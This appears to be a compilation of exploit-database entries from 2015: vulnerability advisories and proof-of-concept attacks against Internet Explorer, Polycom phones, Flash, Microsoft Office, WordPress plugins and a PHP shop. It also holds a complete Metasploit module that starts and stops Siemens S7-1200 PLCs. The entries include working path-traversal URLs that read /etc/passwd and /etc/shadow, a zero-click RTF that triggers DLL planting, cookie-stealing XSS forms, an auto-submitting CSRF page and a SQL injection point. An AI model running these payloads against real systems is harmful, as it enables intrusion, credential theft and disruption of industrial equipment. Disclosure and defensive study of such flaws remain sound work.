    _DPH_HEAP_ROOT @ 9b01000
    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
                                 9b01f04:          9b09e90              170 -          9b09000             2000
          MSHTML!CObjectElement::`vftable'
    74808e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
    77e6134e ntdll!RtlDebugAllocateHeap+0x00000030
    77e1b16e ntdll!RtlpAllocateHeap+0x000000c4
    77dc2fe3 ntdll!RtlAllocateHeap+0x0000023a
    6daf6a27 MSHTML!CObjectElement::CreateElement+0x00000017
    6e0423a4 MSHTML!CHtmParse::ParseBeginTag+0x000000b8
    6df17172 MSHTML!CHtmParse::ParseToken+0x00000096
    6df16a0f MSHTML!CHtmPost::ProcessTokens+0x000004c7
    6dd8341b MSHTML!CHtmPost::Exec+0x00000207
    6da308a8 MSHTML!CHtmPost::Run+0x0000003d
    6da3080e MSHTML!PostManExecute+0x00000061
    6da2727c MSHTML!PostManResume+0x0000007b
    6da971f0 MSHTML!CDwnChan::OnMethodCall+0x0000002f
    6d96e1b3 MSHTML!GlobalWndOnMethodCall+0x0000017b
    6d95577e MSHTML!GlobalWndProc+0x0000012e
    770762fa user32!InternalCallWinProc+0x00000023
    77076d3a user32!UserCallWinProcCheckWow+0x00000109
    770777c4 user32!DispatchMessageWorker+0x000003bc
    7707788a user32!DispatchMessageW+0x0000000f
    6ebfa7b8 IEFRAME!CTabWindow::_TabWindowThreadProc+0x00000464
    6ec38de8 IEFRAME!LCIETab_ThreadProc+0x000003e7
    76a9e81c iertutil!CMemBlockRegistrar::_LoadProcs+0x00000067
    747b4b01 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x00000094
    7588336a kernel32!BaseThreadInitThunk+0x0000000e
    77dc9882 ntdll!__RtlUserThreadStart+0x00000070
    77dc9855 ntdll!_RtlUserThreadStart+0x0000001b

________________________________________________________________________________

III. Mitigation

The issue was fixed in MS15-124 which should be installed to resolve the issue.

________________________________________________________________________________

IV.  Disclosure Timeline

- 2015-08-04 Vulnerability reported to secure@microsoft.com
- 2015-09-24 Microsoft confirms that they successufully reproduced the issue
- 2015-12-08 Microsoft resolves issue in MS15-124

________________________________________________________________________________

Credit:
Bug found by Moritz Jodeit of Blue Frost Security GmbH.
________________________________________________________________________________

Unaltered electronic reproduction of this advisory is permitted. For all other
reproduction or publication, in printing or otherwise, contact
research@bluefrostsecurity.de for permission. Use of the advisory constitutes
acceptance for use in an "as is" condition. All warranties are excluded. In no
event shall Blue Frost Security be liable for any damages whatsoever including
direct, indirect, incidental, consequential, loss of business profits or
special damages, even if Blue Frost Security has been advised of the
possibility of such damages.

Copyright 2015 Blue Frost Security GmbH. All rights reserved. Terms of use apply.
-->
HireHackking 
Polycom VVX-Series Business Media Phones Path Traversal Vulnerability

--Summary--

Polycom VVX-series Business Media Phones allow authenticated users to execute file path traversal attacks

# Polycom
# http://www.polycom.com

--Affects--

# Polycom VVX 101, 201, 300, 310, 400, 410, 500, 600, & 1500
# UC Software 4.1.8 and earlier, 5.2.3 and earlier, 5.3.1 and earlier, 5.4.0 and earlier

--Details--

Polycom VVX-series IP phones provide a web administrative interface. Inside this interface we discovered two URLs that exposed a "file=filename" parameters. Due to unsafe file system operations in this interface, it is possible to exploit the following pages, and possibly others, using path traversal attacks:

http://a.b.c.d/Preferences/Ringtone?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

http://a.b.c.d/Preferences/Background?file=.%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow

--Mitigation--

Upgrade to the latest version of UC Software available.
Disable or restrict access to the web interface.

--Timeline--

# 6/16/2015: Notified Polycom about the issue
# 6/17/2015: Polycom responds, indicates it is investigating
# 6/18/2015: Polycom acknowledges vulnerability legitimacy
# 6/26/2015: Polycom waiting on estimate for fix from engineering
# 7/22/2015: Polycom provides with projected timelines for fixes
# 11/24/2015: Polycom confirms all VVX branches are patched
# 12/9/2015: Polycom issues public vulnerability advisory

--References--

https://depthsecurity.com/blog/polycom-vvx-series-business-media-phones-path-traversal-vulnerability 

http://supportdocs.polycom.com/PolycomService/support/global/documents/support/documentation/VVX_Path_Traversals_v_1_0.pdf

Jake Reynolds
Partner/Principal Consultant
www.depthsecurity.com
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=545

There is a type confusion issue during serialization if ObjectEncoder.dynamicPropertyWriter is overridden with a value that is not a function.

In the following ActionScript:

		flash.net.ObjectEncoding.dynamicPropertyWriter = new subdpw();
		var b = new ByteArray();
		var a = {};
		a.test = 1;
		b.writeObject(a);

The object 'a' with a dynamic property 'test' is serialized using a custom dynamicPropertyWriter of class subpwd. However this class overrides writeDynamicProperties with a property that is not a function leading to type confusion (note that this is not possible in the compiler, the bytecode needs to be modified manually).

To reproduce the issue, load objectencoding.swf. PoC code is also attached. To use this code, compile the swf, and decompress it (for example, using flasm -x), and then search for the string "triteDocumentProperties" in the SWF and change it to "writeDocumentProperties".


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38970.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=548

If IExternalizable.readExternal is overridden with a value that is not a function, Flash assumes it is a function even though it is not one. This leads to execution of a 'method' outside of the ActionScript object's ActionScript vtable, leading to memory corruption.

A sample swf is attached. ActionScript code is also attached, but it does not compile to the needed to swf. To get the PoC, decompress the swf using flasm -x myswf, and then search for "teadExternal" and change it to "readExternal".


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38969.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=556

It is possible for an attacker to execute a DLL planting attack in Microsoft Office 2010 on Windows 7 x86 with a specially crafted OLE object. This attack also works on Office 2013 running on Windows 7 x64. Other platforms were not tested. The attached POC document "planted-mqrt.doc" contains what was originally an embedded Packager object. The CLSID for this object was changed at offset 0x2650 to be {ecabafc9-7f19-11d2-978e-0000f8757e2a} (formatted as pack(">IHHBBBBBBBB")). This object has a InProcServer32 pointing to comsvcs.dll. Specifically the CQueueAdmin object implemented in the dll.

When a user opens this document and single clicks on the icon for foo.txt ole32!OleLoad is invoked on our vulnerable CLSID. This results in a call to a class factory constructor that tries eventually tries to call mqrt!MQGetPrivateComputerInformation. Because mqrt is a delay loaded dll the loader has inserted a stub to call _tailMerge_mqrt_dll on the first call of this function. This results in a kernelbase!LoadLibraryExA call vulnerable to dll planting. If the attached mqrt.dll is placed in the same directory with the planted-mqrt.doc file you should see a popup coming from this DLL being loaded from the current working directory of Word.

It's worth noting that there are several other delay loaded dlls in reachable from comsvcs.dll as well. The full list is:

ADVAPI32.dll
API_MS_WIN_Service_Management_L1_1_0.dll
API_MS_WIN_Service_Management_L2_1_0.dll
API_MS_WIN_Service_winsvc_L1_1_0.dll
API_MS_Win_Security_SDDL_L1_1_0.dll
CLBCatQ.DLL
CRYPTSP.dll
MTXCLU.DLL
ODBC32.dll
VERSION.dll
XOLEHLP.dll
colbact.DLL
dbghelp.dll
mqrt.dll
netutils.dll
samcli.dll

Here is the call stack from the delay loaded mqrt.dll:

0:000> kb
ChildEBP RetAddr  Args to Child              
001b7cb4 76f15d1c 76f30924 00000460 ffffffff ntdll!KiFastSystemCallRet
001b7cb8 76f30924 00000460 ffffffff 001b7da0 ntdll!ZwMapViewOfSection+0xc
001b7d0c 76f3099a 00000460 00000000 00000000 ntdll!LdrpMapViewOfSection+0xc7
001b7da4 76f2fec4 001b7df0 001b7f00 00000000 ntdll!LdrpFindOrMapDll+0x310
001b7f24 76f325ea 001b7f84 001b7f50 00000000 ntdll!LdrpLoadDll+0x2b6
001b7f58 75188c19 003a8aac 001b7f9c 001b7f84 ntdll!LdrLoadDll+0x92
001b7f94 751890ac 00000000 00000000 003a8aac KERNELBASE!LoadLibraryExW+0x1d9
001b7fb4 70dd96c0 70e8de20 00000000 00000000 KERNELBASE!LoadLibraryExA+0x26
001b8000 70e7cb2b 00000000 70e94148 003768a0 comsvcs!__delayLoadHelper2+0x59
001b8054 70e7588e 70ea52ec 5160c47e 8007000e comsvcs!_tailMerge_mqrt_dll+0xd
001b8088 70e75c09 069d8cf8 70dd31ac 5160c442 comsvcs!CMSMQRT::Load+0x3a
001b8090 70dd31ac 5160c442 00000000 001b8114 comsvcs!CQueueAdmin::FinalConstruct+0xa
001b80b4 70dd47ef 00000000 001b9880 069d8cf8 comsvcs!ATL::CComCreator<ATL::CComObject<CQueueAdmin> >::CreateInstance+0x50
001b80c8 70dc7d08 00000000 001b9880 001b8114 comsvcs!ATL::CComCreator2<ATL::CComCreator<ATL::CComObject<CQueueAdmin> >,ATL::CComFailCreator<-2147221232> >::CreateInstance+0x18
001b80e0 765e8c86 06988358 00000000 001b9880 comsvcs!ATL::CComClassFactory::CreateInstance+0x3b
001b8168 76603170 76706444 00000000 001b94e4 ole32!CServerContextActivator::CreateInstance+0x172 [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 1000]
001b81a8 765e8daa 001b94e4 00000000 00414230 ole32!ActivationPropertiesIn::DelegateCreateInstance+0x108 [d:\w7rtm\com\ole32\actprops\actprops.cxx @ 1917]
001b81fc 767602f1 7670646c 00000000 001b94e4 ole32!CApartmentActivator::CreateInstance+0x112 [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 2268]
001b8220 767c6311 765e8d36 001b8410 00000004 RPCRT4!Invoke+0x2a
001b8628 766fd7e6 06a70490 0678a6e8 067982b8 RPCRT4!NdrStubCall2+0x2d6
001b8670 766fd876 06a70490 067982b8 0678a6e8 ole32!CStdStubBuffer_Invoke+0xb6 [d:\w7rtm\com\rpc\ndrole\stub.cxx @ 1590]
001b86b8 766fddd0 067982b8 003a877c 00000000 ole32!SyncStubInvoke+0x3c [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 1187]
001b8704 76618a43 067982b8 06979020 06a70490 ole32!StubInvoke+0xb9 [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 1396]
001b87e0 76618938 0678a6e8 00000000 06a70490 ole32!CCtxComChnl::ContextInvoke+0xfa [d:\w7rtm\com\ole32\com\dcomrem\ctxchnl.cxx @ 1262]
001b87fc 766fa44c 067982b8 00000001 06a70490 ole32!MTAInvoke+0x1a [d:\w7rtm\com\ole32\com\dcomrem\callctrl.cxx @ 2105]
001b882c 766fdb41 d0908070 0678a6e8 06a70490 ole32!AppInvoke+0xab [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 1086]
001b890c 766fe1fd 06798260 003d6098 00000000 ole32!ComInvokeWithLockAndIPID+0x372 [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 1724]
001b8934 76619367 06798260 00000000 06798260 ole32!ComInvoke+0xc5 [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 1469]
001b8948 766fe356 06798260 06798260 0039d408 ole32!ThreadDispatch+0x23 [d:\w7rtm\com\ole32\com\dcomrem\chancont.cxx @ 298]
001b895c 766fe318 06798260 001b8a64 00000000 ole32!DispatchCall+0x27 [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 4273]
001b8988 766fcef0 001b8a50 001b8b78 0697fd00 ole32!CRpcChannelBuffer::SwitchAptAndDispatchCall+0xa1 [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 4321]
001b8a68 765f9d01 0697fd00 001b8b78 001b8b60 ole32!CRpcChannelBuffer::SendReceive2+0xef [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 4076]
001b8ae4 765f9b24 0697fd00 001b8b78 001b8b60 ole32!CAptRpcChnl::SendReceive+0xaf [d:\w7rtm\com\ole32\com\dcomrem\callctrl.cxx @ 603]
001b8b38 766fce06 0697fd00 001b8b78 001b8b60 ole32!CCtxComChnl::SendReceive+0x1c5 [d:\w7rtm\com\ole32\com\dcomrem\ctxchnl.cxx @ 734]
001b8b54 7675476e 06a39d34 001b8ba4 767c6753 ole32!NdrExtpProxySendReceive+0x49 [d:\w7rtm\com\rpc\ndrole\proxy.cxx @ 1932]
001b8b60 767c6753 7a61ad54 001b8fb0 0700022b RPCRT4!NdrpProxySendReceive+0xe
001b8f78 766fc8e2 7660fa10 7661484a 001b8fb0 RPCRT4!NdrClientCall2+0x1a6
001b8f98 765f98ad 00000014 00000004 001b8fc8 ole32!ObjectStublessClient+0xa2 [d:\w7rtm\com\rpc\ndrole\i386\stblsclt.cxx @ 474]
001b8fa8 765e8d1f 06a39d34 00000000 001b94e4 ole32!ObjectStubless+0xf [d:\w7rtm\com\rpc\ndrole\i386\stubless.asm @ 154]
001b8fc8 765e8aa2 76706494 00000001 00000000 ole32!CProcessActivator::CCICallback+0x6d [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 1737]
001b8fe8 765e8a53 76706494 001b9340 00000000 ole32!CProcessActivator::AttemptActivation+0x2c [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 1630]
001b9024 765e8e0d 76706494 001b9340 00000000 ole32!CProcessActivator::ActivateByContext+0x4f [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 1487]
001b904c 76603170 76706494 00000000 001b94e4 ole32!CProcessActivator::CreateInstance+0x49 [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 1377]
001b908c 76602ef4 001b94e4 00000000 001b9a50 ole32!ActivationPropertiesIn::DelegateCreateInstance+0x108 [d:\w7rtm\com\ole32\actprops\actprops.cxx @ 1917]
001b92ec 76603170 76706448 00000000 001b94e4 ole32!CClientContextActivator::CreateInstance+0xb0 [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 685]
001b932c 76603098 001b94e4 00000000 001b9a50 ole32!ActivationPropertiesIn::DelegateCreateInstance+0x108 [d:\w7rtm\com\ole32\actprops\actprops.cxx @ 1917]
001b9b04 76609e25 001b9c20 00000000 00000403 ole32!ICoCreateInstanceEx+0x404 [d:\w7rtm\com\ole32\com\objact\objact.cxx @ 1334]
001b9b64 76609d86 001b9c20 00000000 00000403 ole32!CComActivator::DoCreateInstance+0xd9 [d:\w7rtm\com\ole32\com\objact\immact.hxx @ 343]
001b9b88 76609d3f 001b9c20 00000000 00000403 ole32!CoCreateInstanceEx+0x38 [d:\w7rtm\com\ole32\com\objact\actapi.cxx @ 157]
001b9bb8 7662154c 001b9c20 00000000 00000403 ole32!CoCreateInstance+0x37 [d:\w7rtm\com\ole32\com\objact\actapi.cxx @ 110]
001b9c34 7661f2af ecabafc9 11d27f19 00008e97 ole32!wCreateObject+0x106 [d:\w7rtm\com\ole32\ole232\base\create.cpp @ 3046]
001b9c98 7661f1d4 053d0820 00000000 605c63a8 ole32!OleLoadWithoutBinding+0x9c [d:\w7rtm\com\ole32\ole232\base\create.cpp @ 1576]
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Common Files\Microsoft Shared\office14\mso.dll - 
001b9cc0 5eb283bf 053d0820 605c63a8 02397a00 ole32!OleLoad+0x37 [d:\w7rtm\com\ole32\ole232\base\create.cpp @ 1495]
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Microsoft Office\Office14\wwlib.dll - 
WARNING: Stack unwind information not available. Following frames may be wrong.
001b9d34 60a53973 053d0820 605c63a8 02397a00 mso!Ordinal2023+0x7c
001b9d80 60a53881 036dc800 053d0820 605c63a8 wwlib!DllGetLCID+0x46e24d


It is also possible to trigger this DLL load without requiring a user click by using the following RTF document:

{\rtf1{\object\objemb{\*\objclass None}{\*\oleclsid \'7becabafc9-7f19-11d2-978e-0000f8757e2a\'7d}{\*\objdata 010500000100000001000000000000000000000000000000000000000000000000000000000000000000000000}}}


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38968.zip
HireHackking 
# Exploit Title: Admin Management Xtended 2.4.0 Privilege escalation
# Date: 14-12-2015
# Software Link: https://wordpress.org/plugins/admin-management-xtended/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
 
1. Description
   
Inside almost all wp_ajax function there is no privilege check.

File: admin-management-xtended\general-functions.php

add_action( 'wp_ajax_ame_toggle_visibility', 'ame_toggle_visibility' );
add_action( 'wp_ajax_ame_set_date', 'ame_set_date' );
add_action( 'wp_ajax_ame_save_title', 'ame_save_title' );
add_action( 'wp_ajax_ame_save_slug', 'ame_save_slug' );
add_action( 'wp_ajax_ame_slug_edit', 'ame_slug_edit' );
add_action( 'wp_ajax_ame_save_order', 'ame_save_order' );
add_action( 'wp_ajax_ame_toggle_orderoptions', 'ame_toggle_orderoptions' );
add_action( 'wp_ajax_ame_toggle_showinvisposts', 'ame_toggle_showinvisposts' );
add_action( 'wp_ajax_ame_get_pageorder', 'ame_get_pageorder' );
add_action( 'wp_ajax_ame_ajax_save_categories', 'ame_ajax_save_categories' );
add_action( 'wp_ajax_ame_ajax_get_categories', 'ame_ajax_get_categories' );
add_action( 'wp_ajax_ame_ajax_set_commentstatus', 'ame_ajax_set_commentstatus' );
add_action( 'wp_ajax_ame_ajax_save_tags', 'ame_ajax_save_tags' );
add_action( 'wp_ajax_ame_ajax_toggle_imageset', 'ame_ajax_toggle_imageset' );
add_action( 'wp_ajax_ame_ajax_save_mediadesc', 'ame_ajax_save_mediadesc' );
add_action( 'wp_ajax_ame_author_edit', 'ame_author_edit' );
add_action( 'wp_ajax_ame_save_author', 'ame_save_author' );
add_action( 'wp_ajax_ame_toggle_excludestatus', 'ame_toggle_excludestatus' );
add_action( 'wp_ajax_ame_toggle_sticky', 'ame_toggle_sticky' );

http://security.szurek.pl/admin-management-xtended-240-privilege-escalation.html

2. Proof of Concept

Login as regular user (created using wp-login.php?action=register). Then you can change any post title:

<form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=ame_save_title">
Post id: <input type="text" name="category_id" value="1">
Post title: <input type="text" name="new_title" value="<script>alert(document.cookie);</script>">
<input type="submit" name="submit" value="Change">
</form>

XSS will be visible on post page:

http://wordpress-url/?p=1

Or change media excerpt:

<form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=ame_ajax_save_mediadesc">
Post id: <input type="text" name="postid" value="1">
Excerpt: <input type="text" name="new_mediadesc" value="<script>alert(document.cookie);</script>">
<input type="submit" name="submit" value="Change">
</form>

XSS will be visible for admin:

http://wordpress-url/wp-admin/upload.php

3. Solution:
   
Update to version 2.4.0.1
HireHackking 
#Exploit Title      : ECommerceMajor SQL Injection Vulnerability
#Exploit Author  : Rahul Pratap Singh
#Date                 : 13/Dec/2015
#Home page Link  : https://github.com/xlinkerz/ecommerceMajor
#Website            : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94

1. Description

"prodid" field in productdtl.php is not properly sanitized, that leads to
SQL Injection Vulnerability.

2. Vulnerable Code:

line 14 to 28

<?php
$getallproduct="select * from purchase where id=$_GET[prodid] order by id
desc";
$getallproductresult=mysql_query($getallproduct);
$getallproducttotal=mysql_num_rows($getallproductresult);

3. POC

http://127.0.0.1/ecommercemajor/productdtl.php?prodid=SQLI
HireHackking 
# Exploit Title:  Simatic S7 1200 CPU command module
# Date: 15-12-2015
# Exploit Author: Nguyen Manh Hung
# Vendor Homepage: http://www.siemens.com/
# Tested on: Siemens Simatic S7-1214C
# CVE : None
require 'msf/core'

class Metasploit3 < Msf::Auxiliary
	
	include Msf::Exploit::Remote::Tcp
	include Msf::Auxiliary::Scanner
	def initialize(info = {})
		super(update_info(info,
			'Name'=> 'Simatic S7-1200 CPU START/STOP Module',
			'Description'   => %q{
				Update 2015
				The Siemens Simatic S7-1200 S7 CPU start and stop functions over ISO-TSAP.
			},
			'Author'      => 'Nguyen Manh Hung <tdh.mhung@gmail.com>',
			'License'           => MSF_LICENSE,
			'References'     =>
				[
					[ 'nil' ],
				],
			'Version'        => '$Revision$',
			'DisclosureDate' => '11-2015'
			))
			
			register_options(
				[
					Opt::RPORT(102),
					OptInt.new('FUNC',[true,'func',1]),
					OptString.new('MODE', [true, 'Mode select:
					START -- start PLC
					STOP  -- stop PLC
					SCAN  -- PLC scanner',"SCAN"]),
				], self.class)
	end
####################################################################################
	def packet()
		packets=[		#dua tren TIA portal thay cho hello plc
						"\x03\x00\x00\x23\x1e\xe0\x00\x00"+
						"\x00\x06\x00\xc1\x02\x06\x00\xc2"+
						"\x0f\x53\x49\x4d\x41\x54\x49\x43"+
						"\x2d\x52\x4f\x4f\x54\x2d\x45\x53"+
						"\xc0\x01\x0a",

                 		#session debug
               			"\x03\x00\x00\xc0\x02\xf0\x80\x72"+
               			"\x01\x00\xb1\x31\x00\x00\x04\xca"+
               			"\x00\x00\x00\x02\x00\x00\x01\x20"+
               			"\x36\x00\x00\x01\x1d\x00\x04\x00"+
               			"\x00\x00\x00\x00\xa1\x00\x00\x00"+
               			"\xd3\x82\x1f\x00\x00\xa3\x81\x69"+
               			"\x00\x15\x16\x53\x65\x72\x76\x65"+
               			"\x72\x53\x65\x73\x73\x69\x6f\x6e"+
               			"\x5f\x43\x43\x39\x43\x33\x39\x33"+
               			"\x44\xa3\x82\x21\x00\x15\x0b\x31"+
               			"\x3a\x3a\x3a\x36\x2e\x30\x3a\x3a"+
               			"\x3a\x12\xa3\x82\x28\x00\x15\x0d"+
               			"\x4f\x4d\x53\x2b\x20\x44\x65\x62"+
               			"\x75\x67\x67\x65\x72\xa3\x82\x29"+
               			"\x00\x15\x00\xa3\x82\x2a\x00\x15"+
               			"\x00\xa3\x82\x2b\x00\x04\x84\x80"+
               			"\x80\x80\x00\xa3\x82\x2c\x00\x12"+
               			"\x11\xe1\xa3\x00\xa3\x82\x2d\x00"+
               			"\x15\x00\xa1\x00\x00\x00\xd3\x81"+
               			"\x7f\x00\x00\xa3\x81\x69\x00\x15"+
               			"\x15\x53\x75\x62\x73\x63\x72\x69"+
               			"\x70\x74\x69\x6f\x6e\x43\x6f\x6e"+
               			"\x74\x61\x69\x6e\x65\x72\xa2\xa2"+
               			"\x00\x00\x00\x00\x72\x01\x00\x00",
                		
						######
						"\x03\x00\x00\x77\x02\xf0\x80\x72"+#p1
						"\x02\x00\x68\x31\x00\x00\x05\x42"+
						"\x00\x00\x00\x03\x00\x00\x03\xff"+
						"\x34\x00\x00\x03\xff\x01\x01\x82"+
						"\x32\x01\x00\x17\x00\x00\x01\x3a"+
						"\x82\x3b\x00\x04\x81\x40\x82\x3c"+
						"\x00\x04\x81\x40\x82\x3d\x00\x04"+
						"\x00\x82\x3e\x00\x04\x84\x80\xc0"+
						"\x40\x82\x3f\x00\x15\x00\x82\x40"+
						"\x00\x15\x05\x32\x3b"+
						"\x35\x34\x34\x82\x41"+
						"\x00\x03\x00\x03\x00\x00\x00\x00"+#2
						"\x04\xe8\x89\x69\x00\x12\x00\x00"+
						"\x00\x00\x89\x6a\x00\x13\x00\x89"+
						"\x6b\x00\x04\x00\x00\x00\x00\x00"+
						"\x00\x72\x02\x00\x00",
						#unknown 
                		"\x03\x00\x00\x07\x02\xf0\x00",
                		#bat dau qua trinh diag
                		"\x03\x00\x00\x2b\x02\xf0\x80\x72"+
                		"\x02\x00\x1c\x31\x00\x00\x04\xbb"+
                		"\x00\x00\x00\x05\x00\x00\x03\xff"+
                		"\x34\x00\x00\x00\x01\x00\x00\x00"+
                		"\x00\x00\x00\x00\x00\x00\x00\x72"+
                		"\x02\x00\x00",
                		#tiep tuc diag
                		"\x03\x00\x00\x2b\x02\xf0\x80\x72"+
                		"\x02\x00\x1c\x31\x00\x00\x04\xbb"+
                		"\x00\x00\x00\x06\x00\x00\x03\xff"+
                		"\x34\x00\x00\x00\x02\x00\x01\x01"+
                		"\x00\x00\x00\x00\x00\x00\x00\x72"+
                		"\x02\x00\x00",
#truoc start-stop
                		"\x03\x00\x00\x42\x02\xf0\x80"+
                		"\x72\x02\x00\x33\x31\x00\x00\x04"+
                		"\xfc\x00\x00\x00\x07\x00\x00\x03"+
                		"\xff\x36\x00\x00\x00\x34\x02\x91"+
                		"\x3d\x9b\x1e\x00\x00\x04\xe8\x89"+
                		"\x69\x00\x12\x00\x00\x00\x00\x89"+
                		"\x6a\x00\x13\x00\x89\x6b\x00\x04"+
                		"\x00\x00\x00\x00\x00\x00\x00\x72"+
                		"\x02\x00\x00",
#start
						"\x03\x00\x00\x43\x02\xf0\x80"+
                		"\x72\x02\x00\x34\x31\x00\x00\x04"+
                		"\xf2\x00\x00\x00\x08\x00\x00\x03"+
                		"\xff\x36\x00\x00\x00\x34\x01\x90"+
                		"\x77\x00\x08\x03\x00\x00\x04\xe8"+
                		"\x89\x69\x00\x12\x00\x00\x00\x00"+
                		"\x89\x6a\x00\x13\x00\x89\x6b\x00"+
                		"\x04\x00\x00\x00\x00\x00\x00\x00"+
                		"\x72\x02\x00\x00",
#stop
						"\x03\x00\x00\x43\x02\xf0\x80"+
                		"\x72\x02\x00\x34\x31\x00\x00\x04"+
                		"\xf2\x00\x00\x00\x08\x00\x00\x03"+
                		"\xff\x36\x00\x00\x00\x34\x01\x90"+
                		"\x77\x00\x08\x01\x00\x00\x04\xe8"+
                		"\x89\x69\x00\x12\x00\x00\x00\x00"+
                		"\x89\x6a\x00\x13\x00\x89\x6b\x00"+
                		"\x04\x00\x00\x00\x00\x00\x00\x00"+
                		"\x72\x02\x00\x00",
			]
		return packets
	end
#############################################################################
	def start_PLC(scr)
		print_good "mode select: START"
		sock.put(packet[6].gsub("\xff",[scr].pack("c")))#send hello plc
		sock.get_once()
		sleep(0.05)
		sock.put(packet[7].gsub("\xff",[scr].pack("c")))#send hello plc
		#sock.get_once()
		dt=sock.get_once(-1, sock.def_read_timeout)
		if dt.length.to_i == 30
			print_good "PLC---->RUN"
		else
			a= dt.to_s.gsub(/[\x80-\xff]/," ")
			print_error a.to_s.gsub(/[\x00-\x30]/," ")
		end
	end
#############################################################################
	def stop_PLC(scr)
		print_good "mode select: STOP"
		sock.put(packet[6].gsub("\xff",[scr].pack("c")))#send hello plc
		sock.get_once()
		sleep(0.05)
		sock.put(packet[8].gsub("\xff",[scr].pack("c")))#send hello plc
		dt=sock.get_once(-1, sock.def_read_timeout)
		if dt.length.to_i == 30
			print_good "PLC---->STOP"
		else
			a= dt.to_s.gsub(/[\x80-\xff]/," ")
			print_error a.to_s.gsub(/[\x00-\x30]/," ")
		end
	end
#############################################################################
	def PLC_SCAN(ip)
		sock.put(packet[0])#send hello plc
		sock.get_once()
		sleep(0.05)
		sock.put(packet[1])#xin 1 session debug
		dt=sock.get_once(-1, sock.def_read_timeout)
		sock.put(packet[3])#send hello plc
		sock.get_once()
		arr=dt.split(/;/)
		print_good "#{ip.to_s}:  #{arr[2].to_s} : #{arr[3][0..3].to_s}"
	end
#############################################################################
	def run_host(ip)
		mode=datastore['MODE']
		func=datastore['FUNC']
		connect()
		if mode !="scan" && mode!="SCAN" 
			sock.put(packet[0])#send hello plc
			sock.get_once()
			sleep(0.05)
			sock.put(packet[1])#xin 1 session debug
			dt=sock.get_once(-1, sock.def_read_timeout)
			sock.put(packet[3])#send hello plc
			sock.get_once()
			arr=dt.split(/;/)
			print_good "#{arr[2].to_s} : #{arr[3][0..3].to_s}"
			data=dt.unpack("C*")
			a= (data[24]).to_i
			b= (data[26]).to_i
			scr=a|128
			scr1=b|128
			#print_line scr.to_s
			if arr.length.to_i ==5 #neu lay duoc session
				session_i= arr[4][0..4].each_byte.map { |dt| '\x%02x' % dt.to_i }.join
				pac=packet[2].gsub("\xff",[scr].pack("c"))
				sock.put(pac.gsub("\x35\x34\x34\x82\x41", arr[4][0..4]))
			end
			sock.put(packet[3])#send uknown packet to plc
			sock.get_once()
			case mode
				when "START" , "start"
					start_PLC(scr)
				when "STOP" , "stop"
					stop_PLC(scr)
				else
					print_error("Invalid MODE")
			end
		else
			PLC_SCAN(ip)
		end
		disconnect()
	end
end
HireHackking 
source: https://www.securityfocus.com/bid/64707/info
              
Command School Student Management System is prone to the following security vulnerabilities:
              
1. Multiple SQL-injection vulnerabilities
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An HTML injection vulnerability
5. A security-bypass vulnerability
              
Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
              
Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected. 

[CSRF with XSS Exploit]

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://http://www.example.com/sw/add_topic.php">
<input type="hidden" name="topic"
value="<script>alert(document.cookie);</script>" />
<input type="hidden" name="detail" value="Iphobos Blog" />
<input type="hidden" name="Submit" value="Submit" />
</form>
</body>
</html>